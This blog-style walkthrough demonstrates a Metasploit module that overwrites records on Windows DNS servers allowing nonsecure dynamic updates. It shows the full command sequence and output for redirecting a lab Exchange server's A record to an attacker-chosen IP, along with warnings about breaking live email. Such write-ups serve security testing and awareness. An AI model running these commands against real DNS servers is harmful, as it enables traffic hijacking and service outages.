“Secure” DNS updates is the default in Windows, but there is an option to allow “Nonsecure” updates. I have seen this changed when non-Windows DHCP servers are used (eg Access Points), this opens a network up to some pretty nifty attacks that a Metasploit module just hit the ground for.
The module was originally written by King Sabri, with many touch ups and the spoofing capability by busterbcook
You can read up on the pull request in pr/#8599
Just to drive home the point I’ll be using my Exchange server as a target:
**You will break email for the entire company if you do this on a live network. Doing so is possibly a resume generating event.**
If you are going to be overwriting an existing record make sure to keep a note of the real IP address of the host you are overwriting so that you can fix the record afterwards.
1
2
3
4
|
$ dig @192.168.80.10 sdexchange.sittingduck.info
;; ANSWER SECTION:
sdexchange.sittingduck.info. 1200 IN A 192.168.80.13
|
Here is what the module looks like:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
|
msf > use auxiliary/admin/dns/dyn_dns_update
msf auxiliary(dyn_dns_update) > show options
Module options (auxiliary/admin/dns/dyn_dns_update):
Name Current Setting Required Description
---- --------------- -------- -----------
CHOST no The source address to use for queries and updates
DOMAIN yes The domain name
HOSTNAME yes The name record you want to add
IP no The IP you want to assign to the record
RHOST yes The vulnerable DNS server IP address
TYPE A yes The record type you want to add. (Accepted: A, AAAA, CNAME, TXT)
VALUE no The string to be added with TXT or CNAME record
Auxiliary action:
Name Description
---- -----------
UPDATE Add or update a record. (default)
|
It has 3 different actions, but you’ll mostly want UPDATE. UPDATE will automatically delete a record if it exists already and then add the record back with your specified settings.
1
2
3
4
5
6
7
8
9
|
msf auxiliary(dyn_dns_update) > show actions
Auxiliary actions:
Name Description
---- -----------
ADD Add a new record. Fail if it already exists.
DELETE Delete an existing record.
UPDATE Add or update a record. (default)
|
Here are the settings I chose. Notice the IP address that I’m injecting isn’t on the same subnet as the domain.
1
2
3
4
5
6
7
8
|
msf auxiliary(dyn_dns_update) > set DOMAIN sittingduck.info
DOMAIN => sittingduck.info
msf auxiliary(dyn_dns_update) > set HOSTNAME sdexchange
HOSTNAME => sdexchange
msf auxiliary(dyn_dns_update) > set IP 100.100.100.100
IP => 100.100.100.100
msf auxiliary(dyn_dns_update) > set RHOST 192.168.80.10
RHOST => 192.168.80.10
|
And the output:
1
2
3
4
5
6
7
8
9
|
msf auxiliary(dyn_dns_update) > run
[+] Found existing A record for sdexchange.sittingduck.info
[*] Sending dynamic DNS delete message...
[+] The record 'sdexchange.sittingduck.info => 100.100.100.100' has been deleted!
[*] Sending dynamic DNS add message...
[+] The record 'sdexchange.sittingduck.info => 100.100.100.100' has been added!
[*] Auxiliary module execution completed
msf auxiliary(dyn_dns_update) >
|
#Game Over
This will stay until fixed or another dynamic DNS update is performed from the original server (every 24 hours or so).
